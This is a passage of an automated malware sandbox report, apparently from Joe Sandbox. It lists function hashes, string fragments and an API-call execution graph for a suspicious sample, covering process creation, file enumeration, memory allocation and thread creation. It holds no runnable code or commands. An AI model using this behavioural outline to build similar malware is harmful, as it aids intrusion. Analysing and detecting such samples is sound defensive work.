                                                • Instruction ID: e7858ad1258bf60f01a3735a58444539f3aba3de88f78d457d299af86afac037
                                                • Opcode Fuzzy Hash: 5ac955e9ed3b95e16f9d1ec7d9385f18547964398ae655a1f4f463f3bae88422
                                                • Instruction Fuzzy Hash: A4811DB1900318AFEB14DFE4C881BEEB7BAAF48314F14851DE519E7240EB75AA45CB64
                                                Function 04C63EBA Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: L$S$\$a$c$e$l
                                                • API String ID: 0-3322591375
                                                • Opcode ID: 826988136ecf225063e2fa90149ffbb2a38eb4c65134dde76c4d29e2385dda6c
                                                • Instruction ID: ca84a3090cf1cb4ef1a54a67afabceb99f24961433939af5fb688724731ead16
                                                • Opcode Fuzzy Hash: 826988136ecf225063e2fa90149ffbb2a38eb4c65134dde76c4d29e2385dda6c
                                                • Instruction Fuzzy Hash: C541AB72C10218AADB10DFA4DCC4ADEB7FAEF44314F01855ED80EA7110EB716A418FD5
                                                Function 04C63EB6 Relevance: 8.8, Strings: 7, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: L$S$\$a$c$e$l
                                                • API String ID: 0-3322591375
                                                • Opcode ID: 124a963ca69eed553af8cb630a341a5fdc9d1ecb3d327fcbdafbf76ccdc8162d
                                                • Instruction ID: d5314e060980412dd7a69aa439d58df2560a9d05af353a461b9a284b0d80cc20
                                                • Opcode Fuzzy Hash: 124a963ca69eed553af8cb630a341a5fdc9d1ecb3d327fcbdafbf76ccdc8162d
                                                • Instruction Fuzzy Hash: F0317272C10218AADB50DFA4CCC4BDEB7F6FF48704F05866EE91AA7110EB716A418F95
                                                Function 04C6C51A Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.4588318441.0000000004C60000.00000040.00000001.00040000.00000000.sdmp, Offset: 04C60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4c60000_MqDMLUHvZmSMqiwTfIsHo.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .dll$.dll$WAt$bIW
                                                • API String ID: 0-4102820332
                                                • Opcode ID: b179bc2f3fc1c73d61f2b31d966864737c10c6250e58698f07c98b0c2fc9e2b2
                                                • Instruction ID: 949ab817d6e8dc4c595aae6baba3910c4df59291c5512d6269485e7f6e293664
                                                • Opcode Fuzzy Hash: b179bc2f3fc1c73d61f2b31d966864737c10c6250e58698f07c98b0c2fc9e2b2
                                                • Instruction Fuzzy Hash: 8B5164B0C092699EEB619F558C80BEDBBB9FF46304F0485D9C49DAB201D7782B85CF91

                                                Execution Graph

                                                Execution Coverage:2.6%
                                                Dynamic/Decrypted Code Coverage:3.9%
                                                Signature Coverage:1.4%
                                                Total number of Nodes:493
                                                Total number of Limit Nodes:79
                                                execution_graph 95439 18b710 95442 1a9fe0 95439->95442 95441 18cd81 95445 1a82e0 95442->95445 95444 1aa011 95444->95441 95446 1a836a 95445->95446 95448 1a8304 95445->95448 95447 1a8380 NtAllocateVirtualMemory 95446->95447 95447->95444 95448->95444 95449 197290 95450 1972a8 95449->95450 95454 197302 95449->95454 95450->95454 95455 19abb0 95450->95455 95452 1972ec 95452->95454 95461 19ae40 95452->95461 95456 19abd5 95455->95456 95488 1a46b0 95456->95488 95458 19ae01 95458->95452 95459 19ad42 95459->95458 95460 1a46b0 RtlAllocateHeap 95459->95460 95460->95458 95462 19ae66 95461->95462 95463 19b085 95462->95463 95498 1a8570 95462->95498 95463->95454 95465 19aedc 95465->95463 95501 1ab280 95465->95501 95467 19aef8 95467->95463 95468 19afc9 95467->95468 95507 1a7840 95467->95507 95470 195950 LdrInitializeThunk 95468->95470 95472 19afe8 95468->95472 95470->95472 95477 19b06d 95472->95477 95519 1a7410 95472->95519 95473 19afb1 95515 197de0 95473->95515 95475 19af5d 95475->95463 95475->95473 95476 19af8f 95475->95476 95511 195950 95475->95511 95534 1a3a00 LdrInitializeThunk 95476->95534 95479 197de0 LdrInitializeThunk 95477->95479 95483 19b07b 95479->95483 95483->95454 95484 19b044 95524 1a74b0 95484->95524 95486 19b05e 95529 1a75f0 95486->95529 95489 1a470d 95488->95489 95490 1a4744 95489->95490 95493 1a1070 95489->95493 95490->95459 95492 1a4726 95492->95459 95494 1a1037 95493->95494 95494->95493 95496 1a103c 95494->95496 95497 1aa190 RtlAllocateHeap 95494->95497 95496->95492 95497->95496 95499 1a858d 95498->95499 95500 1a859e CreateProcessInternalW 95499->95500 95500->95465 95502 1ab1f0 95501->95502 95504 1ab24d 95502->95504 95535 1aa150 95502->95535 95504->95467 95505 1ab22a 95538 1aa070 95505->95538 95508 1a785a 95507->95508 95547 2b92c0a 95508->95547 95509 19af54 95509->95468 95509->95475 95512 19596e 95511->95512 95550 1a7a00 95512->95550 95514 19598e 95514->95476 95516 197df3 95515->95516 95556 1a7750 95516->95556 95518 197e1e 95518->95454 95520 1a747f 95519->95520 95522 1a7431 95519->95522 95562 2b939b0 LdrInitializeThunk 95520->95562 95521 1a74a4 95521->95484 95522->95484 95525 1a7522 95524->95525 95526 1a74d4 95524->95526 95563 2b94340 LdrInitializeThunk 95525->95563 95526->95486 95527 1a7547 95527->95486 95530 1a765f 95529->95530 95532 1a7611 95529->95532 95564 2b92fb0 LdrInitializeThunk 95530->95564 95531 1a7684 95531->95477 95532->95477 95534->95473 95541 1a8490 95535->95541 95537 1aa16b 95537->95505 95544 1a84e0 95538->95544 95540 1aa089 95540->95504 95542 1a84aa 95541->95542 95543 1a84bb RtlAllocateHeap 95542->95543 95543->95537 95545 1a84fa 95544->95545 95546 1a850b RtlFreeHeap 95545->95546 95546->95540 95548 2b92c1f LdrInitializeThunk 95547->95548 95549 2b92c11 95547->95549 95548->95509 95549->95509 95551 1a7a9f 95550->95551 95553 1a7a21 95550->95553 95555 2b92d10 LdrInitializeThunk 95551->95555 95552 1a7ae4 95552->95514 95553->95514 95555->95552 95557 1a77c0 95556->95557 95558 1a7771 95556->95558 95561 2b92dd0 LdrInitializeThunk 95557->95561 95558->95518 95559 1a77e5 95559->95518 95561->95559 95562->95521 95563->95527 95564->95531 95566 190d50 95567 190d6a 95566->95567 95572 194720 95567->95572 95569 190d88 95570 190dcd 95569->95570 95571 190dbc PostThreadMessageW 95569->95571 95571->95570 95573 194744 95572->95573 95574 194780 LdrLoadDll 95573->95574 95575 19474b 95573->95575 95574->95575 95575->95569 95576 19f150 95577 19f1b4 95576->95577 95605 196240 95577->95605 95579 19f2e4 95580 19f2dd 95580->95579 95612 196350 95580->95612 95582 19f360 95583 19f492 95582->95583 95602 19f483 95582->95602 95616 19ef30 95582->95616 95584 1a8190 NtClose 95583->95584 95586 19f49c 95584->95586 95587 19f395 95587->95583 95588 19f3a0 95587->95588 95589 1aa150 RtlAllocateHeap 95588->95589 95590 19f3c9 95589->95590 95591 19f3e8 95590->95591 95592 19f3d2 95590->95592 95625 19ee20 CoInitialize 95591->95625 95593 1a8190 NtClose 95592->95593 95595 19f3dc 95593->95595 95596 19f3f6 95627 1a7c80 95596->95627 95598 19f472 95631 1a8190 95598->95631 95600 19f47c 95601 1aa070 RtlFreeHeap 95600->95601 95601->95602 95603 19f414 95603->95598 95604 1a7c80 LdrInitializeThunk 95603->95604 95604->95603 95606 196273 95605->95606 95607 196297 95606->95607 95634 1a7d20 95606->95634 95607->95580 95609 1962ba 95609->95607 95610 1a8190 NtClose 95609->95610 95611 19633a 95610->95611 95611->95580 95613 196375 95612->95613 95639 1a7b30 95613->95639 95617 19ef4c 95616->95617 95618 194720 LdrLoadDll 95617->95618 95620 19ef6a 95618->95620 95619 19ef73 95619->95587 95620->95619 95621 194720 LdrLoadDll 95620->95621 95622 19f03e 95621->95622 95623 194720 LdrLoadDll 95622->95623 95624 19f098 95622->95624 95623->95624 95624->95587 95626 19ee85 95625->95626 95626->95596 95628 1a7c9a 95627->95628 95644 2b92ba0 LdrInitializeThunk 95628->95644 95629 1a7cca 95629->95603 95632 1a81aa 95631->95632 95633 1a81bb NtClose 95632->95633 95633->95600 95635 1a7d3d 95634->95635 95638 2b92ca0 LdrInitializeThunk 95635->95638 95636 1a7d69 95636->95609 95638->95636 95640 1a7b4d 95639->95640 95643 2b92c60 LdrInitializeThunk 95640->95643 95641 1963e9 95641->95582 95643->95641 95644->95629 95645 1959d0 95646 197de0 LdrInitializeThunk 95645->95646 95647 195a00 95646->95647 95649 195a2c 95647->95649 95650 197d60 95647->95650 95651 197da4 95650->95651 95652 197dc5 95651->95652 95657 1a7550 95651->95657 95652->95647 95654 197db5 95655 197dd1 95654->95655 95656 1a8190 NtClose 95654->95656 95655->95647 95656->95652 95658 1a75bf 95657->95658 95660 1a7571 95657->95660 95662 2b94650 LdrInitializeThunk 95658->95662 95659 1a75e4 95659->95654 95660->95654 95662->95659 95663 1a8010 95664 1a80a9 95663->95664 95666 1a8031 95663->95666 95665 1a80bf NtReadFile 95664->95665 95667 1a7690 95668 1a7711 95667->95668 95670 1a76b1 95667->95670 95672 2b92ee0 LdrInitializeThunk 95668->95672 95669 1a7742 95672->95669 95673 1a0fd0 95674 1a0fec 95673->95674 95675 1a1028 95674->95675 95676 1a1014 95674->95676 95678 1a8190 NtClose 95675->95678 95677 1a8190 NtClose 95676->95677 95679 1a101d 95677->95679 95680 1a1031 95678->95680 95683 1aa190 RtlAllocateHeap 95680->95683 95682 1a103c 95683->95682 95684 19988b 95686 19989a 95684->95686 95685 1998a1 95686->95685 95687 1aa070 RtlFreeHeap 95686->95687 95687->95685 95688 189780 95691 189b21 95688->95691 95690 189fdc 95691->95690 95692 1a9d00 95691->95692 95693 1a9d26 95692->95693 95698 184060 95693->95698 95695 1a9d32 95696 1a9d60 95695->95696 95701 1a4800 95695->95701 95696->95690 95705 193450 95698->95705 95700 18406d 95700->95695 95702 1a485a 95701->95702 95704 1a4867 95702->95704 95718 191910 95702->95718 95704->95696 95706 193467 95705->95706 95708 193480 95706->95708 95709 1a8bf0 95706->95709 95708->95700 95710 1a8c08 95709->95710 95711 1a46b0 RtlAllocateHeap 95710->95711 95713 1a8c23 95711->95713 95712 1a8c2c 95712->95708 95713->95712 95714 1a7840 LdrInitializeThunk 95713->95714 95715 1a8c81 95714->95715 95716 1aa070 RtlFreeHeap 95715->95716 95717 1a8c9a 95716->95717 95717->95708 95719 19194b 95718->95719 95742 197b70 95719->95742 95721 191953 95722 1aa150 RtlAllocateHeap 95721->95722 95740 191c15 95721->95740 95723 191969 95722->95723 95724 1aa150 RtlAllocateHeap 95723->95724 95725 19197a 95724->95725 95726 1aa150 RtlAllocateHeap 95725->95726 95727 19198b 95726->95727 95753 195d90 95727->95753 95729 191998 95730 1a46b0 RtlAllocateHeap 95729->95730 95736 1919e9 95729->95736 95731 1919b5 95730->95731 95732 1a46b0 RtlAllocateHeap 95731->95732 95733 1919c3 95732->95733 95735 1a46b0 RtlAllocateHeap 95733->95735 95733->95736 95735->95736 95741 191a1b 95736->95741 95763 1969a0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 95736->95763 95737 194720 LdrLoadDll 95738 191bd5 95737->95738 95759 1a6f20 95738->95759 95740->95704 95741->95737 95743 197b9c 95742->95743 95764 197a60 95743->95764 95746 197bc9 95749 197bd4 95746->95749 95750 1a8190 NtClose 95746->95750 95747 197be1 95748 197bfd 95747->95748 95751 1a8190 NtClose 95747->95751 95748->95721 95749->95721 95750->95749 95752 197bf3 95751->95752 95752->95721 95754 195da6 95753->95754 95755 195db0 95753->95755 95754->95729 95756 195e83 95755->95756 95757 1a46b0 RtlAllocateHeap 95755->95757 95756->95729 95758 195eff 95757->95758 95758->95729 95761 1a6f7a 95759->95761 95760 1a6f87 95760->95740 95761->95760 95775 191c30 95761->95775 95763->95741 95765 197a7a 95764->95765 95769 197b56 95764->95769 95770 1a78e0 95765->95770 95768 1a8190 NtClose 95768->95769 95769->95746 95769->95747 95771 1a78fa 95770->95771 95774 2b935c0 LdrInitializeThunk 95771->95774 95772 197b4a 95772->95768 95774->95772 95796 197e40 95775->95796 95777 191c50 95786 192125 95777->95786 95800 1a09a0 95777->95800 95780 191e51 95781 1ab280 2 API calls 95780->95781 95783 191e66 95781->95783 95782 191cae 95782->95786 95803 1ab150 95782->95803 95791 191e8b 95783->95791 95808 1a4750 95783->95808 95785 197de0 LdrInitializeThunk 95785->95791 95786->95760 95787 191f09 95789 191faf 95787->95789 95787->95791 95813 1a4880 95787->95813 95817 1908d0 95789->95817 95791->95785 95791->95786 95792 1a4880 2 API calls 95791->95792 95793 1908d0 LdrInitializeThunk 95791->95793 95792->95791 95793->95791 95794 191fb9 95794->95791 95795 197de0 LdrInitializeThunk 95794->95795 95795->95794 95797 197e4d 95796->95797 95798 197e6e SetErrorMode 95797->95798 95799 197e75 95797->95799 95798->95799 95799->95777 95801 1a9fe0 NtAllocateVirtualMemory 95800->95801 95802 1a09c1 95801->95802 95802->95782 95804 1ab160 95803->95804 95805 1ab166 95803->95805 95804->95780 95806 1aa150 RtlAllocateHeap 95805->95806 95807 1ab18c 95806->95807 95807->95780 95810 1a47ad 95808->95810 95809 1a47ec 95809->95787 95810->95809 95821 191530 95810->95821 95812 1a47ce 95812->95787 95814 1a48da 95813->95814 95816 1a48fb 95814->95816 95826 195ac0 95814->95826 95816->95787 95818 1908dc 95817->95818 95838 1a8400 95818->95838 95822 1915a1 95821->95822 95823 1914ef 95821->95823 95823->95822 95824 1a46b0 RtlAllocateHeap 95823->95824 95825 19151c 95824->95825 95825->95812 95829 195a57 95826->95829 95827 1a7840 LdrInitializeThunk 95828 195a96 95827->95828 95832 1a8220 95828->95832 95829->95827 95830 195aab 95829->95830 95830->95816 95833 1a82a4 95832->95833 95834 1a8244 95832->95834 95837 2b92e80 LdrInitializeThunk 95833->95837 95834->95830 95835 1a82d5 95835->95830 95837->95835 95839 1a841a 95838->95839 95842 2b92c70 LdrInitializeThunk 95839->95842 95840 1908f2 95840->95794 95842->95840 95843 1970c0 95844 1970dc 95843->95844 95845 19712f 95843->95845 95844->95845 95847 1a8190 NtClose 95844->95847 95854 197258 95845->95854 95856 1964d0 NtClose LdrInitializeThunk LdrInitializeThunk 95845->95856 95846 197275 95849 1970f7 95847->95849 95848 1a46b0 RtlAllocateHeap 95848->95846 95855 1964d0 NtClose LdrInitializeThunk LdrInitializeThunk 95849->95855 95851 197232 95851->95854 95857 1966a0 NtClose LdrInitializeThunk LdrInitializeThunk 95851->95857 95854->95846 95854->95848 95855->95845 95856->95851 95857->95854 95860 1a51c0 95861 1a521a 95860->95861 95862 1a5227 95861->95862 95864 1a2d40 95861->95864 95865 1a9fe0 NtAllocateVirtualMemory 95864->95865 95866 1a2d81 95865->95866 95867 194720 LdrLoadDll 95866->95867 95870 1a2e86 95866->95870 95869 1a2dc7 95867->95869 95868 1a2e00 Sleep 95868->95869 95869->95868 95869->95870 95870->95862 95871 1929ba 95872 196240 2 API calls 95871->95872 95873 1929f3 95872->95873 95874 19333c 95875 197a60 2 API calls 95874->95875 95876 19334c 95875->95876 95877 1a8190 NtClose 95876->95877 95878 193361 95876->95878 95877->95878 95879 1984be 95880 1984c3 95879->95880 95881 1a46b0 RtlAllocateHeap 95880->95881 95882 1984ce 95881->95882 95883 198482 95882->95883 95885 196f10 RtlAllocateHeap LdrInitializeThunk LdrInitializeThunk 95882->95885 95885->95883 95886 2b92ad0 LdrInitializeThunk 95887 196cf0 95888 196d1a 95887->95888 95891 197c10 95888->95891 95890 196d44 95892 197c2d 95891->95892 95898 1a7930 95892->95898 95894 197c7d 95895 197c84 95894->95895 95896 1a7a00 LdrInitializeThunk 95894->95896 95895->95890 95897 197cad 95896->95897 95897->95890 95899 1a79c0 95898->95899 95900 1a7954 95898->95900 95903 2b92f30 LdrInitializeThunk 95899->95903 95900->95894 95901 1a79f9 95901->95894 95903->95901 95904 19f9f0 95905 19fa0d 95904->95905 95906 194720 LdrLoadDll 95905->95906 95907 19fa2b 95906->95907 95908 1a7eb0 95909 1a7f59 95908->95909 95911 1a7ed5 95908->95911 95910 1a7f6f NtCreateFile 95909->95910 95912 1a80f0 95913 1a8114 95912->95913 95914 1a815c 95912->95914 95915 1a8172 NtDeleteFile 95914->95915 95926 1ab1b0 95927 1aa070 RtlFreeHeap 95926->95927 95928 1ab1c5 95927->95928 95929 1a77f0 95930 1a780d 95929->95930 95933 2b92df0 LdrInitializeThunk 95930->95933 95931 1a7835 95933->95931 95934 189720 95935 18972f 95934->95935 95936 189770 95935->95936 95937 18975d CreateThread 95935->95937 95938 19c0e0 95939 19c109 95938->95939 95940 19c20d 95939->95940 95941 19c1b3 FindFirstFileW 95939->95941 95941->95940 95944 19c1ce 95941->95944 95942 19c1f4 FindNextFileW 95943 19c206 FindClose 95942->95943 95942->95944 95943->95940 95944->95942 95946 19bff0 RtlAllocateHeap 95944->95946 95946->95944 95947 19a960 95952 19a690 95947->95952 95949 19a96d 95967 19a330 95949->95967 95951 19a983 95953 19a6b5 95952->95953 95979 198030 95953->95979 95956 19a7f2 95956->95949 95958 19a809 95958->95949 95960 19a800 95960->95958 95962 19a8f1 95960->95962 95994 1a24c0 95960->95994 95998 199d90 95960->95998 95964 19a949 95962->95964 96009 19a0f0 95962->96009 95965 1aa070 RtlFreeHeap 95964->95965 95966 19a950 95965->95966 95966->95949 95968 19a346 95967->95968 95977 19a351 95967->95977 95969 1aa150 RtlAllocateHeap 95968->95969 95969->95977 95970 19a367 95970->95951 95971 198030 GetFileAttributesW 95971->95977 95972 19a65e 95973 19a677 95972->95973 95974 1aa070 RtlFreeHeap 95972->95974 95973->95951 95974->95973 95975 1a24c0 RtlAllocateHeap 95975->95977 95976 199d90 2 API calls 95976->95977 95977->95970 95977->95971 95977->95972 95977->95975 95977->95976 95978 19a0f0 2 API calls 95977->95978 95978->95977 95980 198051 95979->95980 95981 198058 GetFileAttributesW 95980->95981 95982 198063 95980->95982 95981->95982 95982->95956 95983 1a2620 95982->95983 95984 1a262e 95983->95984 95985 1a2635 95983->95985 95984->95960 95986 194720 LdrLoadDll 95985->95986 95987 1a266a 95986->95987 95988 1a2679 95987->95988 96015 1a20f0 LdrLoadDll 95987->96015 95990 1aa150 RtlAllocateHeap 95988->95990 95993 1a2811 95988->95993 95992 1a2692 95990->95992 95991 1aa070 RtlFreeHeap 95991->95993 95992->95991 95992->95993 95993->95960 95995 1a24d6 95994->95995 95997 1a25d6 95994->95997 95996 1a46b0 RtlAllocateHeap 95995->95996 95995->95997 95996->95995 95997->95960 95999 199db6 95998->95999 96000 1a46b0 RtlAllocateHeap 95999->96000 96001 199e12 96000->96001 96016 19d590 96001->96016 96003 199e1d 96004 199fa0 96003->96004 96006 199e3b 96003->96006 96005 199f85 96004->96005 96007 199c50 RtlFreeHeap 96004->96007 96005->95960 96006->96005 96026 199c50 96006->96026 96007->96004 96010 19a116 96009->96010 96011 1a46b0 RtlAllocateHeap 96010->96011 96012 19a187 96011->96012 96013 19d590 2 API calls 96012->96013 96014 19a192 96013->96014 96014->95962 96015->95988 96017 1a46b0 RtlAllocateHeap 96016->96017 96018 19d5a6 96017->96018 96019 19d5b3 96018->96019 96020 1a46b0 RtlAllocateHeap 96018->96020 96019->96003 96021 19d5c4 96020->96021 96021->96019 96022 1a46b0 RtlAllocateHeap 96021->96022 96023 19d5df 96022->96023 96024 1aa070 RtlFreeHeap 96023->96024 96025 19d5ec 96024->96025 96025->96003 96027 199c66 96026->96027 96030 19d600 96027->96030 96029 199d6c 96029->96006 96031 19d624 96030->96031 96032 19d6bc 96031->96032 96033 1aa070 RtlFreeHeap 96031->96033 96032->96029 96033->96032 96034 1a1360 96035 1a136f 96034->96035 96036 1a46b0 RtlAllocateHeap 96035->96036 96040 1a1388 96036->96040 96037 1a13b6 96038 1aa070 RtlFreeHeap 96037->96038 96039 1a13c3 96038->96039 96040->96037 96041 1a13f1 96040->96041 96043 1a13f6 96040->96043 96042 1aa070 RtlFreeHeap 96041->96042 96042->96043

                                                Executed Functions

                                                Function 00189780 Relevance: 40.5, Strings: 32, Instructions: 456COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 39 189780-189b1a 40 189b21-189b28 39->40 41 189b2a-189b4d 40->41 42 189b4f-189b56 40->42 41->40 43 189b5d-189b61 42->43 44 189b8f-189b99 43->44 45 189b63-189b8d 43->45 46 189baa-189bb6 44->46 45->43 47 189bb8-189bc4 46->47 48 189bd4-189be0 46->48 51 189bd2 47->51 52 189bc6-189bcc 47->52 49 189be2-189c03 48->49 50 189c05-189c0f 48->50 49->48 54 189c20-189c29 50->54 51->46 52->51 55 189c2b-189c37 54->55 56 189c47-189c60 54->56 57 189c39-189c3f 55->57 58 189c45 55->58 56->56 59 189c62-189c6c 56->59 57->58 58->54 61 189c7d-189c89 59->61 62 189c8b-189c9d 61->62 63 189c9f 61->63 62->61 65 189ca6-189cad 63->65 66 189caf-189ce2 65->66 67 189ce4-189cfd 65->67 66->65 67->67 68 189cff-189d08 67->68 69 189d0e-189d15 68->69 70 189f4f-189f59 68->70 71 189d3a-189d52 69->71 72 189d17-189d2d 69->72 73 189f6a-189f73 70->73 76 189d8b-189d95 71->76 77 189d54-189d5e 71->77 74 189d38 72->74 75 189d2f-189d35 72->75 78 189f8b-189f92 73->78 79 189f75-189f7e 73->79 74->69 75->74 81 189da6-189db2 76->81 80 189d6f-189d78 77->80 84 18a00a-18a023 78->84 85 189f94-189f9e 78->85 82 189f89 79->82 83 189f80-189f83 79->83 88 189d7a-189d84 80->88 89 189d86 80->89 91 189dc8-189dcf 81->91 92 189db4-189dc6 81->92 82->73 83->82 84->84 90 18a025-18a02f 84->90 86 189fa0-189fbb 85->86 87 189fd7 call 1a9d00 85->87 94 189fbd-189fc1 86->94 95 189fc2-189fc4 86->95 108 189fdc-189fe3 87->108 88->80 89->70 101 18a068-18a071 90->101 102 18a031-18a04c 90->102 96 189e01-189e1a 91->96 97 189dd1-189dff 91->97 92->81 94->95 105 189fd5 95->105 106 189fc6-189fcf 95->106 96->96 107 189e1c-189e22 96->107 97->91 103 18a08d-18a097 101->103 104 18a073-18a08b 101->104 109 18a04e-18a052 102->109 110 18a053-18a055 102->110 111 18a0a8-18a0b1 103->111 104->101 105->85 106->105 112 189e26-189e2a 107->112 108->84 113 189fe5-18a008 108->113 109->110 114 18a066 110->114 115 18a057-18a060 110->115 116 18a0c1-18a0cb 111->116 117 18a0b3-18a0bf 111->117 118 189e4b-189e5b 112->118 119 189e2c-189e49 112->119 113->108 114->90 115->114 117->111 118->118 120 189e5d-189e67 118->120 119->112 122 189e78-189e84 120->122 123 189e94-189e9e 122->123 124 189e86-189e92 122->124 126 189ea0-189ebf 123->126 127 189ed2-189edc 123->127 124->122 129 189ed0 126->129 130 189ec1-189eca 126->130 128 189eed-189ef9 127->128 131 189efb-189f0e 128->131 132 189f10-189f1a 128->132 129->123 130->129 131->128 134 189f2b-189f37 132->134 135 189f39-189f48 134->135 136 189f4a 134->136 135->134 136->68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #E$)$),$+$-$-$-z$.D$1$3o$8C$B$BM$C$C$Fb$I$J$OL$S$[g$aK$e$nt$o$o$re$s$z${$}$-
                                                • API String ID: 0-2918677885
                                                • Opcode ID: 59febbfa21df76e89e8bf0455bb3d5c1759b8ceea10f358143a9d4ab36c3e6f1
                                                • Instruction ID: 65e75aa1f990847e93e5b5287e1dc895b4e37b91a49bfc7b02bc905ea48c1e42
                                                • Opcode Fuzzy Hash: 59febbfa21df76e89e8bf0455bb3d5c1759b8ceea10f358143a9d4ab36c3e6f1
                                                • Instruction Fuzzy Hash: 7D32BEB0D05229CBEB28DF45C894BEDBBB2BB54308F2481D9D1096B280C7B95EC9DF55
                                                Function 0019C0E0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,00000000), ref: 0019C1C4
                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 0019C1FF
                                                • FindClose.KERNELBASE(?), ref: 0019C20A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstNext
                                                • String ID:
                                                • API String ID: 3541575487-0
                                                • Opcode ID: 9085d8d55db55216a895d1f3115b131c486a89e067bf56a09898adbb3f315dba
                                                • Instruction ID: 61cdc79b17e27c7204c6ed364329f342fef637ab2a1cc680d2a8e18ef30e4d7e
                                                • Opcode Fuzzy Hash: 9085d8d55db55216a895d1f3115b131c486a89e067bf56a09898adbb3f315dba
                                                • Instruction Fuzzy Hash: DB316375A00309BBDB20EBA4CC85FFB777CAF54704F144459B959A7181DB70AA848BE0
                                                Function 001A7EB0 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 001A7FA0
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: da791fb94ec58518efa8e9fadd5c188485ef03268c0321174b3b9fece813e00f
                                                • Instruction ID: 90ac2df26f5b603c0bb042f4fcc42007ef39c208763b380c480ad5992f3b5c7b
                                                • Opcode Fuzzy Hash: da791fb94ec58518efa8e9fadd5c188485ef03268c0321174b3b9fece813e00f
                                                • Instruction Fuzzy Hash: 1731A2B5A01609AFCB14DFA9DC81EDFB7B9AF9D310F108219F918A3341D730A951CBA5
                                                Function 001A8010 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 001A80E8
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 602a6e3a6495a8a5e16f36f8f0e3e61c99e5a3b2dc827b6046af5244c5e0acd5
                                                • Instruction ID: 3a48db022bebde781cac328eaf89077d8fd87dd2d6fb7b91872e1851035d3b31
                                                • Opcode Fuzzy Hash: 602a6e3a6495a8a5e16f36f8f0e3e61c99e5a3b2dc827b6046af5244c5e0acd5
                                                • Instruction Fuzzy Hash: 2131E6B5A00608AFCB14DF99D881EEFB7B9EF8C314F108209FD18A7241D730A951CBA4
                                                Function 001A82E0 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00191CAE,?,001A6F87,00000000,00000004,00003000,?,?,?,?,?,001A6F87,00191CAE,00000000,?,001A09C1), ref: 001A839D
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: cad502733431af35e45b41efeab791e2941bba04f50a49f517a9b9f77782e44b
                                                • Instruction ID: 5b64eeba96a0a8c529dc93e18ec04eeca82af4299234c994a7dd083772c0a7d2
                                                • Opcode Fuzzy Hash: cad502733431af35e45b41efeab791e2941bba04f50a49f517a9b9f77782e44b
                                                • Instruction Fuzzy Hash: D12139B5A00208AFDB10EF58DC81EEFB7B9EF99710F108509FD18A7241D730A951CBA1
                                                Function 001A80F0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.4586829537.0000000000180000.00000040.80000000.00040000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_180000_ktmutil.jbxd
